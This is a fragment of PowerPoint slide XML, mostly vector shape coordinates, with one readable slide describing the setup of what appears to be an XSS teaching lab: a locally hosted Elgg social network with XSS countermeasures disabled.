                    <a:pt x="94" y="8"/>
                    <a:pt x="91" y="3"/>
                    <a:pt x="74" y="3"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="19" y="3"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="3"/>
                    <a:pt x="0" y="3"/>
                    <a:pt x="0" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="33"/>
                    <a:pt x="11" y="33"/>
                    <a:pt x="19" y="33"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="60" y="33"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="60" y="188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19" y="188"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="188"/>
                    <a:pt x="0" y="188"/>
                    <a:pt x="0" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="218"/>
                    <a:pt x="11" y="218"/>
                    <a:pt x="19" y="218"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="150" y="218"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="157" y="218"/>
                    <a:pt x="170" y="218"/>
                    <a:pt x="170" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="170" y="188"/>
                    <a:pt x="157" y="188"/>
                    <a:pt x="150" y="188"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="94" y="188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="94" y="12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56" name="Freeform 297">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{575BB452-A38E-46DB-A014-AEA87AEC2A25}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId97"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1419226" y="3746501"/>
              <a:ext cx="79375" cy="133350"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 115 w 188"/>
                <a:gd name="T1" fmla="*/ 111 h 305"/>
                <a:gd name="T2" fmla="*/ 95 w 188"/>
                <a:gd name="T3" fmla="*/ 90 h 305"/>
                <a:gd name="T4" fmla="*/ 24 w 188"/>
                <a:gd name="T5" fmla="*/ 90 h 305"/>
                <a:gd name="T6" fmla="*/ 4 w 188"/>
                <a:gd name="T7" fmla="*/ 105 h 305"/>
                <a:gd name="T8" fmla="*/ 24 w 188"/>
                <a:gd name="T9" fmla="*/ 120 h 305"/>
                <a:gd name="T10" fmla="*/ 81 w 188"/>
                <a:gd name="T11" fmla="*/ 120 h 305"/>
                <a:gd name="T12" fmla="*/ 81 w 188"/>
                <a:gd name="T13" fmla="*/ 275 h 305"/>
                <a:gd name="T14" fmla="*/ 20 w 188"/>
                <a:gd name="T15" fmla="*/ 275 h 305"/>
                <a:gd name="T16" fmla="*/ 0 w 188"/>
                <a:gd name="T17" fmla="*/ 290 h 305"/>
                <a:gd name="T18" fmla="*/ 20 w 188"/>
                <a:gd name="T19" fmla="*/ 305 h 305"/>
                <a:gd name="T20" fmla="*/ 168 w 188"/>
                <a:gd name="T21" fmla="*/ 305 h 305"/>
                <a:gd name="T22" fmla="*/ 188 w 188"/>
                <a:gd name="T23" fmla="*/ 290 h 305"/>
                <a:gd name="T24" fmla="*/ 168 w 188"/>
                <a:gd name="T25" fmla="*/ 275 h 305"/>
                <a:gd name="T26" fmla="*/ 115 w 188"/>
                <a:gd name="T27" fmla="*/ 275 h 305"/>
                <a:gd name="T28" fmla="*/ 115 w 188"/>
                <a:gd name="T29" fmla="*/ 111 h 305"/>
                <a:gd name="T30" fmla="*/ 115 w 188"/>
                <a:gd name="T31" fmla="*/ 25 h 305"/>
                <a:gd name="T32" fmla="*/ 90 w 188"/>
                <a:gd name="T33" fmla="*/ 0 h 305"/>
                <a:gd name="T34" fmla="*/ 65 w 188"/>
                <a:gd name="T35" fmla="*/ 25 h 305"/>
                <a:gd name="T36" fmla="*/ 90 w 188"/>
                <a:gd name="T37" fmla="*/ 50 h 305"/>
                <a:gd name="T38" fmla="*/ 115 w 188"/>
                <a:gd name="T39" fmla="*/ 2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5" y="111"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="115" y="95"/>
                    <a:pt x="112" y="90"/>
                    <a:pt x="95" y="90"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="24" y="90"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="17" y="90"/>
                    <a:pt x="4" y="90"/>
                    <a:pt x="4" y="105"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4" y="120"/>
                    <a:pt x="17" y="120"/>
                    <a:pt x="24" y="120"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="81" y="120"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="81" y="275"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20" y="275"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="275"/>
                    <a:pt x="0" y="275"/>
                    <a:pt x="0" y="290"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="305"/>
                    <a:pt x="13" y="305"/>
                    <a:pt x="20" y="305"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="168" y="305"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="175" y="305"/>
                    <a:pt x="188" y="305"/>
                    <a:pt x="188" y="290"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="188" y="275"/>
                    <a:pt x="175" y="275"/>
                    <a:pt x="168" y="275"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="115" y="275"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="115" y="111"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="115" y="25"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="115" y="11"/>
                    <a:pt x="104" y="0"/>
                    <a:pt x="90" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="76" y="0"/>
                    <a:pt x="65" y="11"/>
                    <a:pt x="65" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="65" y="39"/>
                    <a:pt x="76" y="50"/>
                    <a:pt x="90" y="50"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="104" y="50"/>
                    <a:pt x="115" y="39"/>
                    <a:pt x="115"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57" name="Freeform 298">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56648BD6-334A-4D2B-80C4-BFE0C00A0B99}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId98"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1516064" y="3784601"/>
              <a:ext cx="100013" cy="144463"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 76 w 237"/>
                <a:gd name="T1" fmla="*/ 86 h 329"/>
                <a:gd name="T2" fmla="*/ 137 w 237"/>
                <a:gd name="T3" fmla="*/ 30 h 329"/>
                <a:gd name="T4" fmla="*/ 203 w 237"/>
                <a:gd name="T5" fmla="*/ 110 h 329"/>
                <a:gd name="T6" fmla="*/ 133 w 237"/>
                <a:gd name="T7" fmla="*/ 191 h 329"/>
                <a:gd name="T8" fmla="*/ 76 w 237"/>
                <a:gd name="T9" fmla="*/ 123 h 329"/>
                <a:gd name="T10" fmla="*/ 76 w 237"/>
                <a:gd name="T11" fmla="*/ 86 h 329"/>
                <a:gd name="T12" fmla="*/ 76 w 237"/>
                <a:gd name="T13" fmla="*/ 196 h 329"/>
                <a:gd name="T14" fmla="*/ 134 w 237"/>
                <a:gd name="T15" fmla="*/ 221 h 329"/>
                <a:gd name="T16" fmla="*/ 237 w 237"/>
                <a:gd name="T17" fmla="*/ 110 h 329"/>
                <a:gd name="T18" fmla="*/ 140 w 237"/>
                <a:gd name="T19" fmla="*/ 0 h 329"/>
                <a:gd name="T20" fmla="*/ 76 w 237"/>
                <a:gd name="T21" fmla="*/ 24 h 329"/>
                <a:gd name="T22" fmla="*/ 56 w 237"/>
                <a:gd name="T23" fmla="*/ 3 h 329"/>
                <a:gd name="T24" fmla="*/ 20 w 237"/>
                <a:gd name="T25" fmla="*/ 3 h 329"/>
                <a:gd name="T26" fmla="*/ 0 w 237"/>
                <a:gd name="T27" fmla="*/ 19 h 329"/>
                <a:gd name="T28" fmla="*/ 20 w 237"/>
                <a:gd name="T29" fmla="*/ 33 h 329"/>
                <a:gd name="T30" fmla="*/ 42 w 237"/>
                <a:gd name="T31" fmla="*/ 33 h 329"/>
                <a:gd name="T32" fmla="*/ 42 w 237"/>
                <a:gd name="T33" fmla="*/ 298 h 329"/>
                <a:gd name="T34" fmla="*/ 20 w 237"/>
                <a:gd name="T35" fmla="*/ 298 h 329"/>
                <a:gd name="T36" fmla="*/ 0 w 237"/>
                <a:gd name="T37" fmla="*/ 314 h 329"/>
                <a:gd name="T38" fmla="*/ 20 w 237"/>
                <a:gd name="T39" fmla="*/ 329 h 329"/>
                <a:gd name="T40" fmla="*/ 99 w 237"/>
                <a:gd name="T41" fmla="*/ 329 h 329"/>
                <a:gd name="T42" fmla="*/ 119 w 237"/>
                <a:gd name="T43" fmla="*/ 314 h 329"/>
                <a:gd name="T44" fmla="*/ 98 w 237"/>
                <a:gd name="T45" fmla="*/ 298 h 329"/>
                <a:gd name="T46" fmla="*/ 76 w 237"/>
                <a:gd name="T47" fmla="*/ 298 h 329"/>
                <a:gd name="T48" fmla="*/ 76 w 237"/>
                <a:gd name="T49" fmla="*/ 19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 h="329">
                  <a:moveTo>
                    <a:pt x="76" y="86"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="76" y="57"/>
                    <a:pt x="105" y="30"/>
                    <a:pt x="137" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="174" y="30"/>
                    <a:pt x="203" y="67"/>
                    <a:pt x="203" y="110"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="203" y="158"/>
                    <a:pt x="168" y="191"/>
                    <a:pt x="133" y="191"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="94" y="191"/>
                    <a:pt x="76" y="147"/>
                    <a:pt x="76" y="123"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="76" y="86"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="76" y="196"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="97" y="217"/>
                    <a:pt x="118" y="221"/>
                    <a:pt x="134" y="221"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="189" y="221"/>
                    <a:pt x="237" y="174"/>
                    <a:pt x="237" y="110"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="237" y="49"/>
                    <a:pt x="193" y="0"/>
                    <a:pt x="140" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="116" y="0"/>
                    <a:pt x="93" y="9"/>
                    <a:pt x="76" y="24"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="76" y="10"/>
                    <a:pt x="75" y="3"/>
                    <a:pt x="56" y="3"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="20" y="3"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="3"/>
                    <a:pt x="0" y="3"/>
                    <a:pt x="0" y="19"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="33"/>
                    <a:pt x="13" y="33"/>
                    <a:pt x="20" y="33"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="42" y="33"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="42" y="298"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20" y="298"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="298"/>
                    <a:pt x="0" y="298"/>
                    <a:pt x="0" y="314"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="329"/>
                    <a:pt x="13" y="329"/>
                    <a:pt x="20" y="329"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="99" y="329"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="106" y="329"/>
                    <a:pt x="119" y="329"/>
                    <a:pt x="119" y="314"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="119" y="298"/>
                    <a:pt x="106" y="298"/>
                    <a:pt x="98" y="298"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="76" y="298"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76" y="19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58" name="Freeform 299">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1B020A28-39C6-4BD1-95C4-622FF92DC5CB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId99"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1630364" y="3759201"/>
              <a:ext cx="88900" cy="122238"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 98 w 211"/>
                <a:gd name="T1" fmla="*/ 91 h 279"/>
                <a:gd name="T2" fmla="*/ 180 w 211"/>
                <a:gd name="T3" fmla="*/ 91 h 279"/>
                <a:gd name="T4" fmla="*/ 200 w 211"/>
                <a:gd name="T5" fmla="*/ 77 h 279"/>
                <a:gd name="T6" fmla="*/ 180 w 211"/>
                <a:gd name="T7" fmla="*/ 61 h 279"/>
                <a:gd name="T8" fmla="*/ 98 w 211"/>
                <a:gd name="T9" fmla="*/ 61 h 279"/>
                <a:gd name="T10" fmla="*/ 98 w 211"/>
                <a:gd name="T11" fmla="*/ 20 h 279"/>
                <a:gd name="T12" fmla="*/ 81 w 211"/>
                <a:gd name="T13" fmla="*/ 0 h 279"/>
                <a:gd name="T14" fmla="*/ 63 w 211"/>
                <a:gd name="T15" fmla="*/ 20 h 279"/>
                <a:gd name="T16" fmla="*/ 63 w 211"/>
                <a:gd name="T17" fmla="*/ 61 h 279"/>
                <a:gd name="T18" fmla="*/ 20 w 211"/>
                <a:gd name="T19" fmla="*/ 61 h 279"/>
                <a:gd name="T20" fmla="*/ 0 w 211"/>
                <a:gd name="T21" fmla="*/ 77 h 279"/>
                <a:gd name="T22" fmla="*/ 20 w 211"/>
                <a:gd name="T23" fmla="*/ 91 h 279"/>
                <a:gd name="T24" fmla="*/ 63 w 211"/>
                <a:gd name="T25" fmla="*/ 91 h 279"/>
                <a:gd name="T26" fmla="*/ 63 w 211"/>
                <a:gd name="T27" fmla="*/ 213 h 279"/>
                <a:gd name="T28" fmla="*/ 134 w 211"/>
                <a:gd name="T29" fmla="*/ 279 h 279"/>
                <a:gd name="T30" fmla="*/ 211 w 211"/>
                <a:gd name="T31" fmla="*/ 213 h 279"/>
                <a:gd name="T32" fmla="*/ 194 w 211"/>
                <a:gd name="T33" fmla="*/ 194 h 279"/>
                <a:gd name="T34" fmla="*/ 177 w 211"/>
                <a:gd name="T35" fmla="*/ 213 h 279"/>
                <a:gd name="T36" fmla="*/ 136 w 211"/>
                <a:gd name="T37" fmla="*/ 249 h 279"/>
                <a:gd name="T38" fmla="*/ 98 w 211"/>
                <a:gd name="T39" fmla="*/ 210 h 279"/>
                <a:gd name="T40" fmla="*/ 98 w 211"/>
                <a:gd name="T41" fmla="*/ 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 h="279">
                  <a:moveTo>
                    <a:pt x="98" y="91"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="180" y="91"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="187" y="91"/>
                    <a:pt x="200" y="91"/>
                    <a:pt x="200" y="77"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="200" y="61"/>
                    <a:pt x="188" y="61"/>
                    <a:pt x="180" y="61"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="98" y="61"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="98" y="20"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="98" y="11"/>
                    <a:pt x="98" y="0"/>
                    <a:pt x="81" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="63" y="0"/>
                    <a:pt x="63" y="10"/>
                    <a:pt x="63" y="20"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="63" y="61"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20" y="61"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="61"/>
                    <a:pt x="0" y="61"/>
                    <a:pt x="0" y="77"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="91"/>
                    <a:pt x="12" y="91"/>
                    <a:pt x="20" y="91"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="63" y="91"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="63" y="213"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="63" y="261"/>
                    <a:pt x="97" y="279"/>
                    <a:pt x="134" y="279"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="171" y="279"/>
                    <a:pt x="211" y="258"/>
                    <a:pt x="211" y="213"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="211" y="204"/>
                    <a:pt x="211" y="194"/>
                    <a:pt x="194" y="194"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="177" y="194"/>
                    <a:pt x="177" y="204"/>
                    <a:pt x="177" y="213"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="176" y="244"/>
                    <a:pt x="148" y="249"/>
                    <a:pt x="136" y="249"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="98" y="249"/>
                    <a:pt x="98" y="223"/>
                    <a:pt x="98" y="210"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="98" y="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359" name="Freeform 300">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03A27E12-CD5B-405C-A5BB-69A906A90F0F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId100"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1746251" y="3759201"/>
              <a:ext cx="87313" cy="107950"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 194 w 205"/>
                <a:gd name="T1" fmla="*/ 141 h 249"/>
                <a:gd name="T2" fmla="*/ 205 w 205"/>
                <a:gd name="T3" fmla="*/ 124 h 249"/>
                <a:gd name="T4" fmla="*/ 196 w 205"/>
                <a:gd name="T5" fmla="*/ 109 h 249"/>
                <a:gd name="T6" fmla="*/ 30 w 205"/>
                <a:gd name="T7" fmla="*/ 5 h 249"/>
                <a:gd name="T8" fmla="*/ 17 w 205"/>
                <a:gd name="T9" fmla="*/ 0 h 249"/>
                <a:gd name="T10" fmla="*/ 0 w 205"/>
                <a:gd name="T11" fmla="*/ 17 h 249"/>
                <a:gd name="T12" fmla="*/ 12 w 205"/>
                <a:gd name="T13" fmla="*/ 34 h 249"/>
                <a:gd name="T14" fmla="*/ 155 w 205"/>
                <a:gd name="T15" fmla="*/ 124 h 249"/>
                <a:gd name="T16" fmla="*/ 12 w 205"/>
                <a:gd name="T17" fmla="*/ 215 h 249"/>
                <a:gd name="T18" fmla="*/ 0 w 205"/>
                <a:gd name="T19" fmla="*/ 232 h 249"/>
                <a:gd name="T20" fmla="*/ 17 w 205"/>
                <a:gd name="T21" fmla="*/ 249 h 249"/>
                <a:gd name="T22" fmla="*/ 30 w 205"/>
                <a:gd name="T23" fmla="*/ 244 h 249"/>
                <a:gd name="T24" fmla="*/ 194 w 205"/>
                <a:gd name="T25" fmla="*/ 14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5" h="249">
                  <a:moveTo>
                    <a:pt x="194" y="141"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="199" y="138"/>
                    <a:pt x="205" y="134"/>
                    <a:pt x="205" y="124"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="205" y="118"/>
                    <a:pt x="201" y="112"/>
                    <a:pt x="196" y="109"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="30" y="5"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="23" y="0"/>
                    <a:pt x="22" y="0"/>
                    <a:pt x="17" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="0"/>
                    <a:pt x="0" y="6"/>
                    <a:pt x="0" y="17"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="27"/>
                    <a:pt x="6" y="31"/>
                    <a:pt x="12" y="34"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="155" y="124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12" y="215"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="6" y="218"/>
                    <a:pt x="0" y="222"/>
                    <a:pt x="0" y="232"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="243"/>
                    <a:pt x="9" y="249"/>
                    <a:pt x="17" y="249"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="22" y="249"/>
                    <a:pt x="23" y="249"/>
                    <a:pt x="30" y="244"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="194" y="14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grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1714062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Rectangle 289">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E77F6326-9F33-432F-8968-2181BCBCB649}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="621591" y="3199159"/>
            <a:ext cx="8061158" cy="1206239"/>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2" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0ECC2DE5-3D23-4116-8F66-67DC1E0D980B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Environment setup</a:t>
            </a:r>
            <a:endParaRPr lang="en-NZ" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E0D89C4D-AB32-43D4-9611-3201A6F217CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Elgg: open-source web application for social networking with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>disabled</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> countermeasures for XSS.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Elgg website : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://www.xsslabelgg.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The website is hosted on localhost via Apache’s Virtual Hosting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-NZ" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5F4A1AE7-577D-47CE-A460-C1CC36FDE898}"/>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12</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="888888"/>
              </a:solidFill>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="199" name="Group 198">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00811BFA-1929-4FE3-8CDC-0D3D81DB7248}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks noChangeAspect="1"/>
          </p:cNvGrpSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="913064" y="3332247"/>
            <a:ext cx="4192588" cy="938213"/>
            <a:chOff x="2543176" y="2540000"/>
            <a:chExt cx="4192588" cy="938213"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="110" name="Freeform 101">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2DE20316-77C6-4D98-BB52-ECBEBA87461E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId2"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2543176" y="2554288"/>
              <a:ext cx="87313" cy="107950"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 194 w 206"/>
                <a:gd name="T1" fmla="*/ 34 h 249"/>
                <a:gd name="T2" fmla="*/ 206 w 206"/>
                <a:gd name="T3" fmla="*/ 17 h 249"/>
                <a:gd name="T4" fmla="*/ 188 w 206"/>
                <a:gd name="T5" fmla="*/ 0 h 249"/>
                <a:gd name="T6" fmla="*/ 175 w 206"/>
                <a:gd name="T7" fmla="*/ 5 h 249"/>
                <a:gd name="T8" fmla="*/ 11 w 206"/>
                <a:gd name="T9" fmla="*/ 108 h 249"/>
                <a:gd name="T10" fmla="*/ 0 w 206"/>
                <a:gd name="T11" fmla="*/ 125 h 249"/>
